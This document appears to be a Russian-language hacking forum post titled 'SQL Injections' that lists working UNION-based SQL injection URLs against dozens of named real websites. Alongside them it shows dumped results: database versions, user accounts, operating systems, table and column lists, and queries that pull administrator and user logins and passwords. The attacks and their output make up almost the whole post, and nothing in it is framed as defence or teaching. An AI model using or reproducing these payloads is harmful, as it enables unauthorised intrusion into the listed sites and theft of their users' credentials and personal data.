SQL Инъекции

http://www.bworldonline.com/weekender/content.php?id=-3383+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
http://www.teluguflavours.com/politics/viewnews.php?id=60&cat=politicsgossip+limit+0+union+select+1,2,3,4,5,6/*
http://www.guuui.com/posting.php?id=-1978+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.emarotta.com/article.php?ID=365)+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+

 

http://www.maximum.by/work.php?w=6+and+1=0+union+select+1,group_concat(column_name+separator+0x0a),3,4+from+information_schema.columns+where+table_name=0x776F726B5F636174+--+-

 

Code:

http://www.stargroup-bd.com/details-news.php?id=-1+union+select+1,username,password,4+from+admin+--+

Code:

http://www.fmdc.fr/agees/details-news.php?id=-25+union+select+1,2,3,4,5,6,7,8,9,10+/*+

Code:

http://www.training-market.com/product.php?id_product=-160+union+select+1,2,3,4,5,6,7,8+--+

Code:

http://www.toccataclassics.com/reviews.php?ID=-12+union+select+1,concat_ws(0x3a3a,ID,LoginName,SitePassword),3,4,5,6+from+loginpassword+--+

Code:

http://tformers.com/reviews.php?id=-693+union+select+1,2,concat_ws(0x3a3a,name,uname,email,pass),4,5,6,7,8,9,10,11,12+from+nuke_users+limit+1,1+/*+&op=showcontent

Code:

http://www.astronomyforbeginners.com/reviews/reviews.php?id=-46+union+select+1,2,3,4,5,6,7,8+--+

Code:

http://www.ausanthrop.net/resources/reviews.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+/*+

Code:

http://www.greenbazaar.be/categories.php?id_cat=208+union+select+1,concat_ws(0x3a3a,id_administrator,login,password,status)+from+administrator+--+

Code:

http://www.ekoeki.be/categories.php?id_cat=208+union+select+1,concat_ws(0x3a3a,id_administrator,login,password,status)+from+administrator+--+

Code:

http://www.info-soft.ro/reviews.php?id_review=-67'+union+select+1,concat_Ws(0x3a3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin+limit+0,1+--+

Code:

http://www.muzikreviews.com/reviews.php?ID=-748'+union+select+1,2,concat_ws(0x3a3a,ID,UserName,Password,NeedPasswordChange,LastLogin,FailedLogins,AuthGroupID),4,5,6,7,8+from+auth_users+--+

Code:

http://www.demoshop.li/index.php?catid=316+uNiOn+sElEct+1,2,unhex(hex(database())),4,5,6+/*+

Code:

http://www.womenarts.org/network/reviews.php?id=-3057'+union+select+1,username,password,4+from+users+limit+0,1+--+

Code:

http://www.lpfiction.com/favorites.php?id=-3849+union+select+concat_ws(0x3a3a,username,password)+from+users+where+id=1171+--+

 

Code:

http://fullmoonparty-thailand.net/bboard/show.php?id=-1+union+select+1,2,3,4,5,concat_ws%280x2a,password%29,7,8,9,10+from+fmpnet_faq.faq_admin--

Code:

http://www.paidselling.com/product_desc.php?id=-19999999999+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

 

PostgreSQL 8.1.13 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.4.1 (Mandrakelinux 10.1 3.4.1-4mdk) consultar_web

 

Code:

http://www.suntenglobal.com/news/show.php?ID=112+and+1=0+union+select+1,2,version(),4,5,6--

version - 4.1.20-log
database - suntenglobal
user - hook@localhost

 

lanstore.at

Code:

http://www.lanstore.at/index.php?module=4&site=rental&cat=2+union+select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,22222,33333,444444+limit+1,1+--+

Code:

5.0.84-log:[email protected]:puresystems001

 

5.0.67:[email protected]:glassdecorru_db

5.1.28-rc:conpr_site@localhost:conpr_site

 

http://maxidom.md/page.php?page=8001&id=-19+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6--


Database Version: 4.1.22
Database name: maxidom
User name: maxidom@localhost
Os: portbld-freebsd6.2

 

Database Version: 5.0.22
Database name: bicadmin_pdl
User name: pdl_data@localhost
Os: redhat-linux-gnu

Database Version: 5.0.27
Database name: econsult
User name: admin@localhost
Os: redhat-linux-gnu

 

JEEMA Article Collection 1.x JOOMLA

 

5.0.87-log:zverevcenter@localhost:zverevcenter

 

ТИЦ: 10
PR: 1

Code:

http://www.pornotune.ru/list.php?p2=7%20union%20select%20version%28%29%20--

Version = 5.0.84-percona-highperf-b18-log
User = [email protected]
Database = a25727_1

 

PHP:

http://www.kutkin.ru/pechi.php?id=2-1+UNION+SELECT+1,CONCAT_WS%280x3a,Version%28%29,Database%28%29,User%28%29%29+LIMIT+1,1--+

Database Version: 5.0.85-community
Database name: ipdenis_kutkin
User name: ipdenis_admin@localhost
OS: pc-linux-gnu

 

Code:

http://www.pnlteleorman.ro/stiri.php?id=2+and+1=2+union+all+select+1,group_concat(username,0x3a,password),4,5,6+from+auth_users--

 

новогодний подарочек
кавычки не екранируються!!!

mma@localhost:5.0.27:kcbs_mma:redhat-linux-gnu

DB:

Code:

information_schema:kcbs_db:kcbs_mma

kcbs_db:

Code:

AreaOfInterest:Calendar:ClassInstructor:CompetitionTeam:ContestEvent:ContestRep:Event:EventContact:EventTypes:FamilyMember:Location:MemberInterest:Membership:Organization:Person:Unit

kcbs_mma:

Code:

AreaOfInterest:Calendar:ClassInstructor:CompetitionTeam:ContestEvent:ContestRep:Event:EventContact:EventTypes:FamilyMember:Location:MemberInterest:MemberSignups:Membership:Organization:Person:Unit:admins:categories:cbj:classes:eventDirectors:eventResults:greatamerican:linkcats:links:market_backyard:market_bbq:market_category:market_rate:market_verify:member_survey:news:photos:recipes:reps:rssNews:signups:states:teamoftheyear:teams:topten:totyteams:tourEvents:toy_dev:toyteams_dev:users:webmembers

admins:

Code:

id:nameuser:wordpass

users:

Code:

userId:email:password

webmembers:

Code:

id:memberId:personId:nameuser:wordpass:lastLogin:email:firstname:lastname:city:state:country

person:

Code:

Name:PersonId:Phone:AltPhone:Fax:Email:Address:City:State:Zip:Birthdate:Address2:FirstName:LastName

organization:

Code:

OrganizationID:OrganizationName:OrgAbbreviation:City:Address:State:Zip:Phone:Fax:InvoiceNumber:MembershipFee:FamilyMembershipFee:ForeignMembershipFee:ForeignFamilyMembershipFee:RunningMemNumber:OrganizationID:OrganizationName:OrgAbbreviation:City:Address:State:Zip:Phone:Fax:InvoiceNumber:MembershipFee:FamilyMembershipFee:ForeignMembershipFee

3360 пользователей!

1690 пользователей!

админ

#2

usdbadmin@localhost:4.0.27-log:us_webdatac-linux-gnu

#3

[email protected]:4.1.22-max-log:campisis:unknown-linux-gnu

#4

jbiddle@localhost:5.1.30-communityroducts:Win64

#5

globalwater@localhost:5.0.58:globalwater_site:redhat-linux-gnu

 

Code:

http://www.maps4heroes.com/heroes3/rating.php?id=101'+and+1=0+union+select+1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3+--+

[email protected],5.0.45-Max-log,srv11356_heroes,unknown-linux-gnu

 

Code:

http://it.bakinity.biz/smart.php?cat=-2+union+select+1,concat_ws(0x3a,user(),database(),version()),3&id=114

Code:

[email protected]:orik:4.0.27-log

PS:

http://forum.antichat.ru/showpost.php?p=1755084
Юзай антибоян!
http://mailbrush.eu/antiboyan

 

Unihorizontes.br pr5
Faculdade Novos Horizontes.

Code:

[COLOR=SlateGray]http://www.unihorizontes.br/main.php?id=-73'+union+select+null,null,null,null,null,concat_ws(char(32,124,32),version(),user(),database(),@@version_compile_os),null,null,null,null+--+[/COLOR]

5.0.51a | [email protected] | test | suse-linux-gnu

лучший антибоян гугл

 

http://www.c-o-b.co.uk/page.php?ID=10+union+select+1,2,3,4,group_concat(0x0b,column_name),6+from+information_schema.columns+where+table_name=0x7573657273
users::userID,name,email,password,cdate

http://www.c-o-b.co.uk/page.php?ID=10+union+select+1,2,3,4,group_concat(0x0b,userID,0x3a,name,0x3a,email,0x3a,password),6+from+users

MySQL 5.0.85-community

http://www.c-o-b.co.uk/admin